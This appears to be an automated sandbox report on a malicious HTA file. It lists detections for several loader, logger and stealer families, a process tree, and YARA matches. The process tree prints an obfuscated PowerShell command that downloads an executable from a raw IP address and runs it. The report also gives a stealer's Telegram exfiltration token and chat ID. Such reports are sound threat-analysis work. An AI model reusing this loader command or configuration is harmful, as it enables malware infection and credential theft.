Edit tour

Windows Analysis Report
niceworkingskilldevelopedwithgreatnews.hta

Overview

General Information

Sample name:	niceworkingskilldevelopedwithgreatnews.hta
Analysis ID:	1634283
MD5:	dbaa05b3c52b9b9199d48e9c3ec4b3e2
SHA1:	1cde3a1736d2b71ab0e27c0dd0fc6c9ae3bdac55
SHA256:	5e18bfde60f96b7ea7de2182379c6c50ff90c0dcb67872498526c02b25363387
Tags:	htauser-abuse_ch
Infos:

Detection

Cobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected Cobalt Strike Beacon

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DBatLoader

Yara detected MSIL Logger

Yara detected MassLogger RAT

Yara detected Powershell decode and execute

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

PowerShell case anomaly found

Powershell drops PE file

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Suspicious MSHTA Child Process

Suspicious command line found

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 7060 cmdline: mshta.exe "C:\Users\user\Desktop\niceworkingskilldevelopedwithgreatnews.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

cmd.exe (PID: 6072 cmdline: "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1956 cmdline: POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

csc.exe (PID: 5200 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

cvtres.exe (PID: 1072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2571.tmp" "c:\Users\user\AppData\Local\Temp\gbdknv1n\CSCC8613962BFBB4D698240FB82ECB0F974.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

vcc.exe (PID: 3616 cmdline: "C:\Users\user\AppData\Roaming\vcc.exe" MD5: 882396942BDED48550AD6CDDEB511480)

cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\8161.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1380 cmdline: C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\29106.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

daphpvwO.pif (PID: 3320 cmdline: C:\\Users\\user\\Links\daphpvwO.pif MD5: C116D3604CEAFE7057D77FF27552C215)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7944799152:AAGEIoBASD2qU30MwhTZbPlH5kb-mmGcJTU", "Telegram Chatid": "403948698"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x5e777:$a1: get_encryptedPassword 0x5e74b:$a2: get_encryptedUsername 0x5e80f:$a3: get_timePasswordChanged 0x5e727:$a4: get_passwordField 0x5e78d:$a5: set_encryptedPassword 0x5e55a:$a7: get_logins 0x5dae4:$a8: GetOutlookPasswords 0x5d00d:$a9: StartKeylogger 0x5ba45:$a10: KeyLoggerEventArgs 0x5ba14:$a11: KeyLoggerEventArgsEventHandler 0x5e62e:$a13: _encryptedPassword
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
0000000B.00000002.3830040719.000000002B930000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
0000000B.00000001.1464557928.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbd9:$a1: get_encryptedPassword 0x1cbad:$a2: get_encryptedUsername 0x1cc71:$a3: get_timePasswordChanged 0x1cb89:$a4: get_passwordField 0x1cbef:$a5: set_encryptedPassword 0x1c9bc:$a7: get_logins 0x1bf46:$a8: GetOutlookPasswords 0x1b46f:$a9: StartKeylogger 0x19ea7:$a10: KeyLoggerEventArgs 0x19e76:$a11: KeyLoggerEventArgsEventHandler 0x1ca90:$a13: _encryptedPassword
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1dad1:$a1: get_encryptedPassword 0x1daa5:$a2: get_encryptedUsername 0x1db69:$a3: get_timePasswordChanged 0x1da81:$a4: get_passwordField 0x1dae7:$a5: set_encryptedPassword 0x1d8b4:$a7: get_logins 0x1ce3e:$a8: GetOutlookPasswords 0x1c367:$a9: StartKeylogger 0x1ad9f:$a10: KeyLoggerEventArgs 0x1ad6e:$a11: KeyLoggerEventArgsEventHandler 0x1d988:$a13: _encryptedPassword
0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x222af:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x217ad:$a3: \Google\Chrome\User Data\Default\Login Data 0x21abb:$a4: \Orbitum\User Data\Default\Login Data 0x228b3:$a5: \Kometa\User Data\Default\Login Data
0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3829347045.00000000293F5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3809626790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x22041:$a1: get_encryptedPassword 0x4a579:$a1: get_encryptedPassword 0x22015:$a2: get_encryptedUsername 0x4a54d:$a2: get_encryptedUsername 0x220d9:$a3: get_timePasswordChanged 0x4a611:$a3: get_timePasswordChanged 0x21ff1:$a4: get_passwordField 0x4a529:$a4: get_passwordField 0x22057:$a5: set_encryptedPassword 0x4a58f:$a5: set_encryptedPassword 0x21e24:$a7: get_logins 0x4a35c:$a7: get_logins 0x213ae:$a8: GetOutlookPasswords 0x498e6:$a8: GetOutlookPasswords 0x208d7:$a9: StartKeylogger 0x48e0f:$a9: StartKeylogger 0x1f30f:$a10: KeyLoggerEventArgs 0x47847:$a10: KeyLoggerEventArgs 0x1f2de:$a11: KeyLoggerEventArgsEventHandler 0x47816:$a11: KeyLoggerEventArgsEventHandler 0x21ef8:$a13: _encryptedPassword
00000006.00000002.1466196833.00000000021D9000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
Process Memory Space: daphpvwO.pif PID: 3320	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: daphpvwO.pif PID: 3320	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: daphpvwO.pif PID: 3320	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
Process Memory Space: daphpvwO.pif PID: 3320	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: daphpvwO.pif PID: 3320	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb239:$a1: get_encryptedPassword 0x20c1c:$a1: get_encryptedPassword 0x60755:$a1: get_encryptedPassword 0x9ae56:$a1: get_encryptedPassword 0xacfb0:$a1: get_encryptedPassword 0xb20d:$a2: get_encryptedUsername 0x20bf0:$a2: get_encryptedUsername 0x60729:$a2: get_encryptedUsername 0x9ae2a:$a2: get_encryptedUsername 0xacf84:$a2: get_encryptedUsername 0xb2d1:$a3: get_timePasswordChanged 0x20cb4:$a3: get_timePasswordChanged 0x607ed:$a3: get_timePasswordChanged 0x9aeee:$a3: get_timePasswordChanged 0xad048:$a3: get_timePasswordChanged 0xb1e9:$a4: get_passwordField 0x20bcc:$a4: get_passwordField 0x60705:$a4: get_passwordField 0x9ae06:$a4: get_passwordField 0xacf60:$a4: get_passwordField 0xb24f:$a5: set_encryptedPassword
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.daphpvwO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
11.2.daphpvwO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.daphpvwO.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 21 88 44 24 2B 88 44 24 2F B0 B3 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	JoeSecurity_MSILLogger	Yara detected MSIL Logger	Joe Security
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1cbe9:$a1: get_encryptedPassword 0x1cbbd:$a2: get_encryptedUsername 0x1cc81:$a3: get_timePasswordChanged 0x1cb99:$a4: get_passwordField 0x1cbff:$a5: set_encryptedPassword 0x1c9cc:$a7: get_logins 0x1bf56:$a8: GetOutlookPasswords 0x1b47f:$a9: StartKeylogger 0x19eb7:$a10: KeyLoggerEventArgs 0x19e86:$a11: KeyLoggerEventArgsEventHandler 0x1caa0:$a13: _encryptedPassword
11.2.daphpvwO.pif.29240ee8.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x213c7:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x208c5:$a3: \Google\Chrome\User Data\Default\Login Data 0x20bd3:$a4: \Orbitum\User Data\Default\Login Data 0x219cb:$a5: \Kometa\User Data\Default\Login Data
